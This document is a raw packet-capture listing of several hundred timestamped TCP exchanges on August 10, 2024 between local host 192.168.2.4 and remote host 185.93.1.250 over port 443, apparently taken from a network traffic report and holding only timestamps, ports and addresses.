                                  Aug 10, 2024 19:10:08.274859905 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.274920940 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.275089025 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.275089979 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.275151968 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.275242090 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.275327921 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.275379896 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.275398016 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.275413036 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.275444031 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.275486946 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.275958061 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.276005030 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.276155949 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.276155949 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.276218891 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.276274920 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.276756048 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.276799917 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.276823997 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.276839018 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.276870966 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.276895046 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.283355951 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.283418894 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.283549070 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.283549070 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.283611059 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.283673048 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.284126043 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.284193993 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.284328938 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.284328938 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.284389973 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.284451962 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.366478920 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.366537094 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.366559982 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.366575003 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.366605997 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.366626978 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.366672039 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.366718054 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.366913080 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.366914034 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.366976023 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.367041111 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.367140055 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.367187023 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.367343903 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.367343903 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.367404938 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.367460966 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.367925882 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.367985010 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.368007898 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.368021965 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.368061066 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.368081093 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.368431091 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.368473053 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.368495941 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.368541002 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.368577957 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.368598938 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.369307041 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.369364977 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.369395971 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.369406939 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.369432926 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.369451046 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.375879049 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.375937939 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.376079082 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.376079082 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.376142025 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.376216888 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.376430035 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.376517057 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.376521111 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.376545906 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.376586914 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.376619101 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.458791018 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.458848000 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.458944082 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.458945036 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.459024906 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.459090948 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.459337950 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.459387064 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.459448099 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.459448099 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.459470034 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.459840059 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.459966898 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.460015059 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.460048914 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.460067987 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.460097075 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.460139990 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.460464001 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.460535049 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.460546017 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.460558891 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.460594893 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.460616112 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.461107016 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.461149931 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.461188078 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.461204052 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.461225986 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.461272955 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.461791039 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.461836100 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.461870909 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.461880922 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.461915016 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.461941957 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.468321085 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.468389034 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.468414068 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.468430042 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.468461037 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.468616962 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.469146013 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.469204903 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.469224930 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.469238043 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.469269991 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.469326973 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.552181005 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.552249908 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.552270889 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.552292109 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.552320004 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.552356005 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.552432060 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.552511930 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.552517891 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.552541018 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.552571058 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.552850962 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.552882910 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.552906036 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.552907944 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.552937031 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.552990913 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.552992105 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.553417921 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.553459883 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.553493977 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.553508043 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.553543091 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.553580999 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.554191113 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.554267883 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.554279089 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.554308891 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.554349899 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.554349899 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.555064917 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.555129051 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.555138111 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.555160046 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.555203915 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.555468082 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.561203003 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.561265945 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.561291933 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.561307907 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.561336040 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.561356068 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.561760902 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.561803102 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.561834097 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.561850071 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.561878920 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.561958075 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.644706011 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.644764900 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.644938946 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.644938946 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.645001888 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.645220995 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.645232916 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.645246983 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.645283937 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.645287991 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.645327091 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.645370007 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.645405054 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.646104097 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.646146059 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.646190882 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.646210909 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.646236897 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.646302938 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.646351099 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.646368027 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.646379948 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.646413088 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.646433115 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.647044897 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.647089005 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.647125959 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.647141933 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.647167921 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.647325993 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.647716045 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.647759914 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.647794008 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.647804976 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.647833109 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.647945881 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.653285027 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.653335094 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.653374910 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.653387070 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.653417110 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.654062986 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.654110909 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.654133081 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.654145002 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:08.654176950 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:08.654197931 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.717730999 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.717761040 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.717807055 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.718008041 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.718008041 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.718105078 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.718153954 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.718210936 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.718210936 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.718776941 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.718839884 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.718990088 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.718990088 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.719050884 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.719742060 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.719805002 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.719822884 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.719841003 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.719872952 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.719959974 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.720002890 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.720021963 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.720036983 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.720067978 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.720514059 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.720582962 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.720586061 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.720621109 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.720659971 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.721110106 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.721131086 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.721168995 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.721180916 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.721209049 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.721225977 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.721251011 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.721282005 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.721292973 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.721323967 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.722228050 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.722249031 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.722287893 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.722301960 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.722331047 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.722925901 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.722951889 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.722987890 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.723000050 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.723031044 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.723536968 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.723557949 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.723608971 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.723619938 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.723645926 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.724415064 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.724438906 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.724522114 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.724530935 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.724530935 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.724539042 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.724553108 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.724585056 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.724606037 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.725625038 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.725646019 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.725687981 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.725698948 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.725725889 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.725743055 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.725919008 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.725941896 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.725984097 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.725996017 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.726021051 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.726051092 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.726413965 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.726444960 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.726489067 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.726499081 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.726525068 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.726717949 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.726788044 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.726811886 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.726852894 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.726869106 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.726891994 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.726912022 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.727560043 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.727586031 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.727622032 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.727632999 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.727660894 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.727667093 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.727706909 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.727720976 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.727731943 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.727763891 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.727786064 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.728522062 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.728544950 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.728578091 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.728589058 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.728616953 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.728627920 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.728652000 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.728669882 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.728679895 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.728708982 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.728732109 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.729468107 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.729487896 CEST44349734185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:09.729525089 CEST49734443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:09.729541063 CEST44349734185.93.1.250192.168.2.4
